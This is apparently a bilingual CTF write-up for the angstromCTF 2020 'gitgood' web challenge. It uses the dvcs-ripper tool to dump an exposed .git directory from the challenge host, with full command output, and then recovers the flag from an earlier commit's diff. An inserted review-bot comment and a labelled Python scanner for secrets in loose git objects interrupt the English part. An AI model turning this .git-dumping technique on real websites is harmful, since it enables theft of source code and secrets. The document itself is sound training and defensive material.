https://ctftime.org/task/10758
Japanese version below
Writeup in English
Required Knowledge
- Git
Writeup
This is all that comes up. The HTTP response only reveals that the site runs on Express + nginx, and since the page is just index.html, nothing looks out of place.
Go back to the challenge description.
Did you know that angstrom has a git repo for all the challenges? I noticed that clam committed a very work in progress challenge so I thought it was worth sharing.
The author keeps using the word "git". Is there a way to pull out git's data?
【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
Found one!
kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG...
I'll use this; these days the environment can be set up with Docker. (Great…)
```
docker run -it k0st/alpine-dvcs-ripper /bin/bash
bash-4.3$
```
Now it is ready to use. Run the command given in the documentation.
```
bash-4.3$ rip-git.pl -v -u https://gitgood.2020.chall.actf.co/.git/
[i] Downloading git files from https://gitgood.2020.chall.actf.co/.git/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[i] Using session name: zqWbzkQI
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[d] found objects/6b/3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[d] found objects/e9/75d678f209da09fff763cd297a6ed8dd77bb35
[d] found refs/heads/master
[!] found info file for packs, trying to process them: objects/info/packs
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
error: 9402d143d3d7998247c95597b63598ce941e7bcb: invalid sha1 pointer in cache-tree
[d] found objects/c2/658d7d1b31848c3b71960543cb0368e56cd4c7
[d] found objects/63/8887a54973265c428cd51ce6dfd48f196d91c4
[d] found objects/24/7c9d491c0d2d6da5e93afcd0681b3edd7ccd70
[d] found objects/49/b319c37dc674bca682cab0f2506473dda6bd9a
[d] found objects/8f/08af35205d0ba80e94b4f4306311039d62e138
[d] found objects/94/02d143d3d7998247c95597b63598ce941e7bcb
[d] found objects/b6/30430d9d393a6b143af2839fd24ac2118dba79
[d] found objects/78/9fa5caf452f5f6f25bfa9b1c0ab1d593dce1b3
[i] Got items with git fsck: 8, Items fetched: 8
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[d] found objects/0f/52598006f9cdb21db2f4c8d44d70535630289b
[i] Got items with git fsck: 1, Items fetched: 1
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[i] Got items with git fsck: 0, Items fetched: 0
[!] No more items to fetch. That's it!
bash-4.3$ ls
index.html index.js package-lock.json package.json thisistheflag.txt
```
Oh, amazing. I was really able to git clone.
```
bash-4.3$ cat thisistheflag.txt
There used to be a flag here...
```
OK. Let's look at the log.
```
bash-4.3$ git log
[[33mcommit e975d678f209da09fff763cd297a6ed8dd77bb35[[m
Author: aplet123 <noneof@your.business>
Date: Sat Mar 7 16:27:44 2020 +0000

    Initial commit

[[33mcommit 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5[[m
Author: aplet123 <noneof@your.business>
Date: Sat Mar 7 16:27:24 2020 +0000

    haha I lied this is the actual initial commit
```
The latest commit message is "Initial Commit", but there is a commit before it.
I guess the scenario is that the commit message was amended.
bash-4.3$ git diff 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5 [[1mdiff --git a/thisistheflag.txt b/thisistheflag.txt[[m [[1mindex 0f52598..247c9d4 100644[[m [[1m--- a/thisistheflag.txt[[m [[1m+++ b/thisistheflag.txt[[m [[36m@@ -1,3 +1 @@[[m [[31m-actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}[[m [[31m-[[m [[31m-btw this isn't the actual git server[[m [[32m+[[m[[32mThere used to be a flag here...[[m
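Review bot: the removed line in thisistheflag.txt (`-actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}`) is a secret that this change only overwrites with a placeholder, so the old content stays in the repository as blob 0f52598 and is still reachable from commit 6b3c94c. Treat the value as exposed and rotate it, and rewrite history to drop that blob instead of committing over the file.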
The output looks garbled, but the flag comes out. The color codes are probably being printed raw.
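Why the overwritten flag was still retrievable: the diff header places it in blob 0f52598, which the current tree no longer references but which still sat as a file under objects/. The following is an added example, not part of the original writeup. It audits a `.git` directory's loose objects for a secret pattern before deployment; the function names, the temporary repository and the `EXAMPLE{...}` value are constructed for illustration.

```python
import hashlib
import re
import tempfile
import zlib
from pathlib import Path


def write_loose_object(git_dir: Path, kind: str, body: bytes) -> str:
    """Store body the way git stores a loose object and return its object id."""
    raw = f"{kind} {len(body)}".encode() + b"\0" + body
    oid = hashlib.sha1(raw).hexdigest()
    path = git_dir / "objects" / oid[:2] / oid[2:]
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(zlib.compress(raw))
    return oid


def scan_loose_objects(git_dir: Path, pattern: bytes) -> dict:
    """Return {object id: [matches]} for every loose blob matching pattern."""
    hits = {}
    for path in sorted((git_dir / "objects").glob("[0-9a-f][0-9a-f]/*")):
        try:
            raw = zlib.decompress(path.read_bytes())
        except zlib.error:
            continue  # not a loose object (foreign or corrupt file)
        header, _, body = raw.partition(b"\0")
        if header.split(b" ")[0] != b"blob":
            continue  # commits and trees carry no file content
        found = re.findall(pattern, body)
        if found:
            oid = path.parent.name + path.name
            hits[oid] = [m.decode(errors="replace") for m in found]
    return hits


def demo() -> dict:
    """Constructed repo: a secret blob that a later commit replaced."""
    with tempfile.TemporaryDirectory() as tmp:
        git_dir = Path(tmp) / ".git"
        old = write_loose_object(git_dir, "blob", b"EXAMPLE{constructed_secret}\n")
        new = write_loose_object(git_dir, "blob", b"There used to be a flag here...\n")
        hits = scan_loose_objects(git_dir, rb"EXAMPLE\{[^}]+\}")
        return {"old": old, "new": new, "hits": hits}


if __name__ == "__main__":
    print(demo()["hits"])
```

Objects that git has already packed under objects/pack are not covered by this scan; run it alongside a history-aware secret scanner for those.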
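Japanese version follows
Required Knowledge
- Knowledge of Git
Explanation
This is all that shows up. Looking at the HTTP response only tells me it is running on Express + nginx. And since it is just index.html, nothing looks odd.
Go back to the challenge description.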
Did you know that angstrom has a git repo for all the challenges? I noticed that clam committed a very work in progress challenge so I thought it was worth sharing.
Git is being pushed awfully hard. Could there be a way to pull out the git data?
【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
There is one!
So you go after things like .git. I see.
kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG...
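This is the tool to use, and these days the environment can be set up with Docker. (Wonderful…)
```
docker run -it k0st/alpine-dvcs-ripper /bin/bash
bash-4.3$
```
With that, it is ready to use (wow, the power of modern tooling).
Run the command given in the documentation.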
```
bash-4.3$ rip-git.pl -v -u https://gitgood.2020.chall.actf.co/.git/
[i] Downloading git files from https://gitgood.2020.chall.actf.co/.git/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[i] Using session name: zqWbzkQI
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[d] found objects/6b/3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[d] found objects/e9/75d678f209da09fff763cd297a6ed8dd77bb35
[d] found refs/heads/master
[!] found info file for packs, trying to process them: objects/info/packs
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
error: 9402d143d3d7998247c95597b63598ce941e7bcb: invalid sha1 pointer in cache-tree
[d] found objects/c2/658d7d1b31848c3b71960543cb0368e56cd4c7
[d] found objects/63/8887a54973265c428cd51ce6dfd48f196d91c4
[d] found objects/24/7c9d491c0d2d6da5e93afcd0681b3edd7ccd70
[d] found objects/49/b319c37dc674bca682cab0f2506473dda6bd9a
[d] found objects/8f/08af35205d0ba80e94b4f4306311039d62e138
[d] found objects/94/02d143d3d7998247c95597b63598ce941e7bcb
[d] found objects/b6/30430d9d393a6b143af2839fd24ac2118dba79
[d] found objects/78/9fa5caf452f5f6f25bfa9b1c0ab1d593dce1b3
[i] Got items with git fsck: 8, Items fetched: 8
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[d] found objects/0f/52598006f9cdb21db2f4c8d44d70535630289b
[i] Got items with git fsck: 1, Items fetched: 1
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[i] Got items with git fsck: 0, Items fetched: 0
[!] No more items to fetch. That's it!
bash-4.3$ ls
index.html index.js package-lock.json package.json thisistheflag.txt
```
Oh, wow. It really did git clone.
```
bash-4.3$ cat thisistheflag.txt
There used to be a flag here...
```
Hmm. Let's check the log.
```
bash-4.3$ git log
[[33mcommit e975d678f209da09fff763cd297a6ed8dd77bb35[[m
Author: aplet123 <noneof@your.business>
Date: Sat Mar 7 16:27:44 2020 +0000

    Initial commit

[[33mcommit 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5[[m
Author: aplet123 <noneof@your.business>
Date: Sat Mar 7 16:27:24 2020 +0000

    haha I lied this is the actual initial commit
```
The latest one is "Initial Commit", but there is a commit before it.
I guess the scenario is that the commit message got fixed.
bash-4.3$ git diff 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5 [[1mdiff --git a/thisistheflag.txt b/thisistheflag.txt[[m [[1mindex 0f52598..247c9d4 100644[[m [[1m--- a/thisistheflag.txt[[m [[1m+++ b/thisistheflag.txt[[m [[36m@@ -1,3 +1 @@[[m [[31m-actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}[[m [[31m-[[m [[31m-btw this isn't the actual git server[[m [[32m+[[m[[32mThere used to be a flag here...[[m
It looks garbled, but the flag comes out. The color codes are probably being printed raw, but I would like to view it properly. What should I use to view it?